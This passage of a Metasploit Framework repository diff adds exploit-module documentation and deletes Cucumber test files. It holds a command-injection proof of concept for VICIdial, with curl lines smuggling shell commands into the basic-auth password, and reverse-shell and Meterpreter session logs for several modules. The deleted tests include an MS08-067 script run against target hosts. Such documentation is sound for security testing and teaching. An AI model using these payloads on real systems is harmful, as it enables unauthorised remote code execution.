[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
|
||||
[*] 172.16.191.215:55552 - API version 1.0
|
||||
[+] 172.16.191.215:55552 - Created console #0
|
||||
[*] 172.16.191.215:55552 - Sending payload...
|
||||
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root)
|
||||
```
|
||||
|
|
@ -0,0 +1,133 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in VICIdial versions 2.9 RC1 to 2.13 RC1 which allows unauthenticated users to execute arbitrary operating system commands as the web server user if password encryption is enabled (disabled by default).
|
||||
|
||||
When password encryption is enabled the user's password supplied using HTTP basic authentication is used in a call to `exec()`.
|
||||
|
||||
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well.
|
||||
|
||||
This module has been tested successfully on version 2.11 RC2 and 2.13 RC1 on CentOS.
|
||||
|
||||
Installers:
|
||||
|
||||
* [VICIdial 2.11 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download)
|
||||
* [VICIdial 2.13 RC1](https://sourceforge.net/projects/astguiclient/files/astguiclient_2.13rc1.zip/download)
|
||||
|
||||
Follow the [instructions to enabled password encryption](http://vicidial.org/docs/ENCRYPTED_PASSWORDS.txt).
|
||||
|
||||
|
||||
## Technical Details
|
||||
|
||||
The `functions.php` file defines a function called `user_authorization`:
|
||||
|
||||
```php
|
||||
function user_authorization($user,$pass,$user_option,$user_update)
|
||||
```
|
||||
|
||||
This function is used throughout the application to validate user logon credentials supplied using HTTP basic authentication. If password encryption is enabled the user's password is passed to the `pass` argument of the `bp.pl` Perl script, without quotes, using PHP's `exec()` function:
|
||||
|
||||
```php
|
||||
if ($SSpass_hash_enabled > 0)
|
||||
{
|
||||
if (file_exists("../agc/bp.pl"))
|
||||
{$pass_hash = exec("../agc/bp.pl --pass=$pass");}
|
||||
else
|
||||
{$pass_hash = exec("../../agc/bp.pl --pass=$pass");}
|
||||
```
|
||||
|
||||
A rudimentary blacklist is used to prevent command injection. The apostrophe `'`, quote `"`, semi-colon `;` and backslash `\` characters are removed from the user's username and password using `preg_replace`, like so:
|
||||
|
||||
```php
|
||||
$user = preg_replace("/\'|\"|\\\\|;/","",$user);
|
||||
$pass = preg_replace("/\'|\"|\\\\|;/","",$pass);
|
||||
```
|
||||
|
||||
It is trivial to bypass the blacklist.
|
||||
|
||||
For example, backticks ``` ` ```, pipe `|` or ampersand `&` are sufficient to bypass the blacklist and execute arbitrary operating system commands.
|
||||
|
||||
For the purposes of exploitation, reaching the `user_authorization` function call with malicious input is hindered by additional input validation in use prior to the authentication check throughout the majority of the codebase:
|
||||
|
||||
```php
|
||||
$PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_USER);
|
||||
$PHP_AUTH_PW = preg_replace('/[^-_0-9a-zA-Z]/', '', $PHP_AUTH_PW);
|
||||
```
|
||||
|
||||
However, in VICIdial version 2.11RC2, at least two files did not make use of the additional validation:
|
||||
|
||||
* help.php
|
||||
* vicidial_sales_viewer.php
|
||||
|
||||
In VICIdial version 2.13RC1, at least one file did not make use of the additional validation:
|
||||
|
||||
* vicidial_sales_viewer.php
|
||||
|
||||
This vulnerability was patched in revision 2759.
|
||||
|
||||
|
||||
## Proof of Concept
|
||||
|
||||
```bash
|
||||
$ curl -isk "https://VICIdial.local/vicidial/vicidial_sales_viewer.php" \
|
||||
--user 'anyusername:anypassword& id>/tmp/pwned_by_sales_viewer #'
|
||||
```
|
||||
|
||||
```bash
|
||||
$ curl -isk "https://VICIdial.local/vicidial/help.php" \
|
||||
--user 'anyusername:anypassword& id>/tmp/pwned_by_help #'
|
||||
```
|
||||
|
||||
Note that `/tmp/pwned_by_help` and `/tmp/pwned_by_sales_viewer` files should contain the results of the `id` command.
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec`
|
||||
3. Do: `set rhost [IP]`
|
||||
4. Do: `run`
|
||||
5. You should get a session
|
||||
|
||||
|
||||
## Sample Output
|
||||
|
||||
```
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
|
||||
[*] 172.16.191.150:80 The target appears to be vulnerable.
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] 172.16.191.150:80 Sending payload (505 bytes)
|
||||
[+] 172.16.191.150:80 Payload sent successfully
|
||||
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.150:36660) at 2017-05-27 01:00:41 -0400
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
```
|
||||
|
||||
|
||||
## Sample Output (Verbose)
|
||||
|
||||
```
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > check
|
||||
|
||||
[*] 172.16.191.150:80 Password encryption is supported, but may not be enabled.
|
||||
[*] 172.16.191.150:80 The target appears to be vulnerable.
|
||||
msf exploit(vicidial_user_authorization_unauth_cmd_exec) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] 172.16.191.150:80 Sending payload (505 bytes)
|
||||
[+] 172.16.191.150:80 Payload sent successfully
|
||||
[*] Command shell session 2 opened (172.16.191.181:4444 -> 172.16.191.150:36661) at 2017-05-27 01:00:48 -0400
|
||||
|
||||
id
|
||||
uid=48(apache) gid=48(apache) groups=48(apache)
|
||||
```
|
||||
|
|
@ -0,0 +1,53 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability.
|
||||
|
||||
This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software.
|
||||
|
||||
This module has been tested successfully on
|
||||
|
||||
* Easy Chat Server 3.1 on Windows XP En SP3
|
||||
|
||||
Installers:
|
||||
|
||||
[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploits/windows/http/easychatserver_seh`
|
||||
3. Do: `set rhosts [IP]`
|
||||
4. Do: `exploit`
|
||||
5. You should get your payload executed
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
marco@kali:~$ msfconsole -q
|
||||
msf > use exploit/windows/http/easychatserver_seh
|
||||
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
|
||||
RHOST => 192.168.56.101
|
||||
msf exploit(easychatserver_seh) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Sending stage (957487 bytes) to 192.168.56.101
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : MM-8B040C5B05D9
|
||||
OS : Windows XP (Build 2600, Service Pack 3).
|
||||
Architecture : x86
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
|
||||
msf exploit(easychatserver_seh) >
|
||||
```
|
|
@ -1,8 +1,8 @@
|
|||
## Description
|
||||
|
||||
This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain.
|
||||
This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain.
|
||||
|
||||
This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application
|
||||
This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
|
@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context
|
|||
|
||||
This module has been tested successfully on
|
||||
|
||||
* Easy File Sharing 7.2 on Windows XP En Sp3
|
||||
* Easy File Sharing 7.2 on Windows XP En Sp3
|
||||
|
||||
Installers:
|
||||
|
||||
|
@ -18,11 +18,11 @@ Installers:
|
|||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploits/windows/http/easyfilesharing_post`
|
||||
3. Do: `set rhosts [IP]`
|
||||
4. Do: `exploit`
|
||||
5. You should get your payload executed
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploits/windows/http/easyfilesharing_post`
|
||||
3. Do: `set rhosts [IP]`
|
||||
4. Do: `exploit`
|
||||
5. You should get your payload executed
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post
|
|||
msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101
|
||||
RHOST => 192.168.56.101
|
||||
msf exploit(easyfilesharing_post) > exploit
|
||||
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.56.1:4444
|
||||
[*] Sending stage (957487 bytes) to 192.168.56.101
|
||||
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200
|
||||
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : MM
|
||||
OS : Windows XP (Build 2600, Service Pack 3).
|
||||
|
@ -47,7 +47,7 @@ Logged On Users : 2
|
|||
Meterpreter : x86/windows
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
|
||||
[*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit
|
||||
msf exploit(easyfilesharing_post) >
|
||||
```
|
|
@ -1,5 +1,6 @@
|
|||
## Creating A Testing Environment
|
||||
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
|
||||
|
||||
To use this module you need an x86 executable type meterpreter on a x64 windows machine.
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
|
@ -23,9 +24,10 @@ This module was not tested against, but may work against:
|
|||
|
||||
### Windows 10 x64
|
||||
|
||||
```
|
||||
msf exploit(handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on <MSF_IP>:4567
|
||||
[*] Started reverse TCP handler on <MSF_IP>:4567
|
||||
[*] Starting the payload handler...
|
||||
[*] Sending stage (957487 bytes) to <Win10x64_IP>
|
||||
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:50917) at 2017-03-22 11:43:42 -0500
|
||||
|
@ -39,8 +41,8 @@ This module was not tested against, but may work against:
|
|||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(handler) > use post/windows/manage/archmigrate
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(handler) > use post/windows/manage/archmigrate
|
||||
msf post(archmigrate) > set session 1
|
||||
session => 1
|
||||
msf post(archmigrate) > run
|
||||
|
@ -70,4 +72,5 @@ This module was not tested against, but may work against:
|
|||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x64/windows
|
||||
Meterpreter : x64/windows
|
||||
```
|
|
@ -1,111 +0,0 @@
|
|||
Feature: Help command
|
||||
|
||||
Background:
|
||||
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
|
||||
|
||||
Scenario: The 'help' command's output
|
||||
Then the output should contain:
|
||||
"""
|
||||
Core Commands
|
||||
=============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
? Help menu
|
||||
banner Display an awesome metasploit banner
|
||||
cd Change the current working directory
|
||||
color Toggle color
|
||||
connect Communicate with a host
|
||||
exit Exit the console
|
||||
get Gets the value of a context-specific variable
|
||||
getg Gets the value of a global variable
|
||||
grep Grep the output of another command
|
||||
help Help menu
|
||||
history Show command history
|
||||
irb Drop into irb scripting mode
|
||||
load Load a framework plugin
|
||||
quit Exit the console
|
||||
route Route traffic through a session
|
||||
save Saves the active datastores
|
||||
sessions Dump session listings and display information about sessions
|
||||
set Sets a context-specific variable to a value
|
||||
setg Sets a global variable to a value
|
||||
sleep Do nothing for the specified number of seconds
|
||||
spool Write console output into a file as well the screen
|
||||
threads View and manipulate background threads
|
||||
unload Unload a framework plugin
|
||||
unset Unsets one or more context-specific variables
|
||||
unsetg Unsets one or more global variables
|
||||
version Show the framework and console library version numbers
|
||||
|
||||
|
||||
Module Commands
|
||||
===============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
advanced Displays advanced options for one or more modules
|
||||
back Move back from the current context
|
||||
edit Edit the current module with the preferred editor
|
||||
info Displays information about one or more modules
|
||||
loadpath Searches for and loads modules from a path
|
||||
options Displays global options or for one or more modules
|
||||
popm Pops the latest module off the stack and makes it active
|
||||
previous Sets the previously loaded module as the current module
|
||||
pushm Pushes the active or list of modules onto the module stack
|
||||
reload_all Reloads all modules from all defined module paths
|
||||
search Searches module names and descriptions
|
||||
show Displays modules of a given type, or all modules
|
||||
use Selects a module by name
|
||||
|
||||
|
||||
Job Commands
|
||||
============
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
handler Start a payload handler as job
|
||||
jobs Displays and manages jobs
|
||||
kill Kill a job
|
||||
rename_job Rename a job
|
||||
|
||||
|
||||
Resource Script Commands
|
||||
========================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
makerc Save commands entered since start to a file
|
||||
resource Run the commands stored in a file
|
||||
|
||||
|
||||
Database Backend Commands
|
||||
=========================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
db_connect Connect to an existing database
|
||||
db_disconnect Disconnect from the current database instance
|
||||
db_export Export a file containing the contents of the database
|
||||
db_import Import a scan result file (filetype will be auto-detected)
|
||||
db_nmap Executes nmap and records the output automatically
|
||||
db_rebuild_cache Rebuilds the database-stored module cache
|
||||
db_status Show the current database status
|
||||
hosts List all hosts in the database
|
||||
loot List all loot in the database
|
||||
notes List all notes in the database
|
||||
services List all services in the database
|
||||
vulns List all vulnerabilities in the database
|
||||
workspace Switch between database workspaces
|
||||
|
||||
|
||||
Credentials Backend Commands
|
||||
============================
|
||||
|
||||
Command Description
|
||||
------- -----------
|
||||
creds List all credentials in the database
|
||||
|
||||
|
||||
"""
|
||||
|
|
@ -1,48 +0,0 @@
|
|||
@targets @db
|
||||
Feature: MS08-067 netapi
|
||||
|
||||
Background:
|
||||
Given a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
|
||||
Scenario: The MS08-067 should get a session with bind_tcp
|
||||
Given I ready the windows targets
|
||||
Given a file named "ms08-067-bind.rc" with:
|
||||
"""
|
||||
<ruby>
|
||||
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
|
||||
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
|
||||
payload_name = 'windows/meterpreter/bind_tcp'
|
||||
exploited_hosts = []
|
||||
failed_hosts = []
|
||||
|
||||
hosts.each do |host|
|
||||
print_status("Trying MS08-067 against #{host['ipAddress']}")
|
||||
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
|
||||
mod.datastore['PAYLOAD'] = payload_name
|
||||
mod.datastore['RHOST'] = host['ipAddress']
|
||||
m = mod.exploit_simple(
|
||||
'LocalInput' => nil,
|
||||
'LocalOutput' => nil,
|
||||
'Payload' => payload_name,
|
||||
'RunAsJob' => false
|
||||
)
|
||||
|
||||
sleep(1)
|
||||
|
||||
if m
|
||||
exploited_hosts << host['ipAddress']
|
||||
else
|
||||
failed_hosts << host['ipAddress']
|
||||
end
|
||||
end
|
||||
|
||||
print_status("Exploited hosts: #{exploited_hosts.inspect}")
|
||||
print_status("Failed hosts: #{failed_hosts.inspect}")
|
||||
self.run_single('sessions -K')
|
||||
</ruby>
|
||||
"""
|
||||
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
|
||||
Then the 'Mdm::Host' table contains the expected targets
|
||||
|
|
@ -1,153 +0,0 @@
|
|||
@boot
|
||||
Feature: `msfconsole` `database.yml`
|
||||
|
||||
In order to connect to the database in `msfconsole`
|
||||
As a user calling `msfconsole` from a terminal
|
||||
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
|
||||
|
||||
1. An explicit argument to the `-y` flag to `msfconsole`
|
||||
2. The MSF_DATABASE_CONFIG environment variable
|
||||
3. The user's `~/.msf4/database.yml`
|
||||
4. `config/database.yml` in the metasploit-framework checkout location.
|
||||
|
||||
Scenario: With all 4 locations, --yaml wins
|
||||
Given a file named "command_line.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: command_line_metasploit_framework_test
|
||||
username: command_line_metasploit_framework_test
|
||||
"""
|
||||
And a file named "msf_database_config.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: environment_metasploit_framework_test
|
||||
username: environment_metasploit_framework_test
|
||||
"""
|
||||
And I set the environment variables to:
|
||||
| variable | value |
|
||||
| MSF_DATABASE_CONFIG | msf_database_config.yml |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
|
||||
Then the output should contain "command_line_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
|
||||
Given a file named "msf_database_config.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: environment_metasploit_framework_test
|
||||
username: environment_metasploit_framework_test
|
||||
"""
|
||||
And I set the environment variables to:
|
||||
| variable | value |
|
||||
| MSF_DATABASE_CONFIG | msf_database_config.yml |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "environment_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And a directory named ".msf4"
|
||||
And I cd to ".msf4"
|
||||
And a file named "database.yml" with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: user_metasploit_framework_test
|
||||
username: user_metasploit_framework_test
|
||||
"""
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
|
||||
Then the output should contain "user_metasploit_framework_test"
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" exists with:
|
||||
"""
|
||||
test:
|
||||
adapter: postgresql
|
||||
database: project_metasploit_framework_test
|
||||
username: project_metasploit_framework_test
|
||||
"""
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "project_metasploit_framework_test"
|
||||
|
||||
|
||||
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
|
||||
Given I unset the environment variables:
|
||||
| variable |
|
||||
| MSF_DATABASE_CONFIG |
|
||||
And a directory named "home"
|
||||
And I cd to "home"
|
||||
And a mocked home directory
|
||||
And I cd to "../.."
|
||||
And the project "database.yml" does not exist
|
||||
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
|
||||
Then the output should not contain "command_line_metasploit_framework_test"
|
||||
And the output should not contain "environment_metasploit_framework_test"
|
||||
And the output should not contain "user_metasploit_framework_test"
|
||||
And the output should not contain "project_metasploit_framework_test"
|
||||
And the output should contain "[*] postgresql selected, no connection"
|
||||
|
||||
Scenario: Starting `msfconsole` with a valid database.yml
|
||||
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
|
||||
Then the output should contain "[*] postgresql connected to metasploit_framework_test"
|
||||
|
|
@ -1,20 +0,0 @@
|
|||
Given /^I unset the environment variables:$/ do |table|
|
||||
table.hashes.each do |row|
|
||||
variable = row['variable'].to_s.upcase
|
||||
|
||||
# @todo add extension to Announcer
|
||||
announcer.instance_eval do
|
||||
if @options[:env]
|
||||
print "$ unset #{variable}"
|
||||
end
|
||||
end
|
||||
|
||||
current_value = ENV.delete(variable)
|
||||
|
||||
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
|
||||
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
|
||||
unless original_env.key? variable
|
||||
original_env[variable] = current_value
|
||||
end
|
||||
end
|
||||
end
|
|
@ -1,14 +0,0 @@
|
|||
require 'metasploit/framework/database/cucumber'
|
||||
|
||||
Given /^the project "database.yml" does not exist$/ do
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
end
|
||||
|
||||
Given /^the project "database.yml" exists with:$/ do |file_content|
|
||||
Metasploit::Framework::Database::Cucumber.backup_project_configurations
|
||||
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
|
||||
end
|
||||
|
||||
After do
|
||||
Metasploit::Framework::Database::Cucumber.restore_project_configurations
|
||||
end
|
|
@ -1,26 +0,0 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
case ARGV[0]
|
||||
when 'size'
|
||||
puts "30 134"
|
||||
when '-a'
|
||||
puts <<EOS
|
||||
speed 38400 baud; 30 rows; 134 columns;
|
||||
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
|
||||
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
|
||||
-extproc
|
||||
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
|
||||
-ignbrk brkint -inpck -ignpar -parmrk
|
||||
oflags: opost onlcr -oxtabs -onocr -onlret
|
||||
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
|
||||
-dtrflow -mdmbuf
|
||||
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
|
||||
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
|
||||
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
|
||||
stop = ^S; susp = ^Z; time = 0; werase = ^W;
|
||||
EOS
|
||||
when '-g'
|
||||
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
|
||||
end
|
||||
|
||||
exit 0
|
|
@ -1,34 +0,0 @@
|
|||
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
|
||||
# that child process needs to load 'simplecov'.
|
||||
|
||||
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
|
||||
# It is recommended to regenerate this file in the future when you upgrade to a
|
||||
# newer version of cucumber-rails. Consider adding your own code to a new file
|
||||
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
|
||||
# files.
|
||||
|
||||
require 'cucumber/rails'
|
||||
require 'aruba/cucumber'
|
||||
|
||||
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
|
||||
# order to ease the transition to Capybara we set the default here. If you'd
|
||||
# prefer to use XPath just remove this line and adjust any selectors in your
|
||||
# steps to use the XPath syntax.
|
||||
Capybara.default_selector = :css
|
||||
|
||||
# By default, any exception happening in your Rails application will bubble up
|
||||
# to Cucumber so that your scenario will fail. This is a different from how
|
||||
# your application behaves in the production environment, where an error page will
|
||||
# be rendered instead.
|
||||
#
|
||||
# Sometimes we want to override this default behaviour and allow Rails to rescue
|
||||
# exceptions and display an error page (just like when the app is running in production).
|
||||
# Typical scenarios where you want to do this is when you test your error pages.
|
||||
# There are two ways to allow Rails to rescue exceptions:
|
||||
#
|
||||
# 1) Tag your scenario (or feature) with @allow-rescue
|
||||
#
|
||||
# 2) Set the value below to true. Beware that doing this globally is not
|
||||
# recommended as it will mask a lot of errors for you!
|
||||
#
|
||||
ActionController::Base.allow_rescue = false
|
|
@ -1,39 +0,0 @@
|
|||
Before do
|
||||
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
|
||||
set_env('RAILS_ENV', 'test')
|
||||
@aruba_timeout_seconds = 8.minutes
|
||||
end
|
||||
|
||||
Before('@db') do |scenario|
|
||||
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
end
|
||||
|
||||
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
|
||||
# unless Bundler.settings.without.include?(:coverage)
|
||||
# Before do |scenario|
|
||||
# command_name = case scenario
|
||||
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
|
||||
# "#{scenario.feature.title} #{scenario.name}"
|
||||
# when Cucumber::Ast::OutlineTable::ExampleRow
|
||||
# scenario_outline = scenario.scenario_outline
|
||||
#
|
||||
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
|
||||
# else
|
||||
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
|
||||
# end
|
||||
#
|
||||
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
|
||||
# # of overwriting each other as 'Cucumber Features'
|
||||
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
|
||||
#
|
||||
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
|
||||
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
|
||||
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
|
||||
# end
|
||||
#
|
||||
# Before('@db') do |scenario|
|
||||
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
|
||||
# ActiveRecord::Base.establish_connection(dbconfig["test"])
|
||||
# end
|
||||
# end
|
|
@ -1,16 +0,0 @@
|
|||
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
|
||||
|
||||
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
|
||||
|
||||
# will not be set if hook does not run because `bundle install --without coverage`
|
||||
if simplecov_command_name
|
||||
require 'simplecov'
|
||||
|
||||
require 'pathname'
|
||||
|
||||
root = Pathname(__FILE__).expand_path.parent.parent.parent
|
||||
|
||||
SimpleCov.command_name(simplecov_command_name)
|
||||
SimpleCov.root(root)
|
||||
load root.join('.simplecov')
|
||||
end
|
|
@ -1,11 +0,0 @@
|
|||
require 'pathname'
|
||||
|
||||
support = Pathname.new(__FILE__).realpath.parent
|
||||
|
||||
paths = [
|
||||
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
|
||||
# output.
|
||||
support.join('bin').to_path,
|
||||
ENV['PATH']
|
||||
]
|
||||
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)
|
|
@ -1,7 +0,0 @@
|
|||
windows:
|
||||
-
|
||||
hostname: wxpsp0
|
||||
ip: 127.0.0.100
|
||||
-
|
||||
hostname: wxpsp2
|
||||
ip: 127.0.0.101
|
|
@ -1,36 +0,0 @@
|
|||
require 'metasploit/framework/database'
|
||||
|
||||
module Metasploit::Framework::Database::Cucumber
|
||||
def self.project_configurations_path
|
||||
Rails.root.join('config', 'database.yml').to_path
|
||||
end
|
||||
|
||||
def self.backup_project_configurations
|
||||
if File.exist?(project_configurations_path)
|
||||
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
|
||||
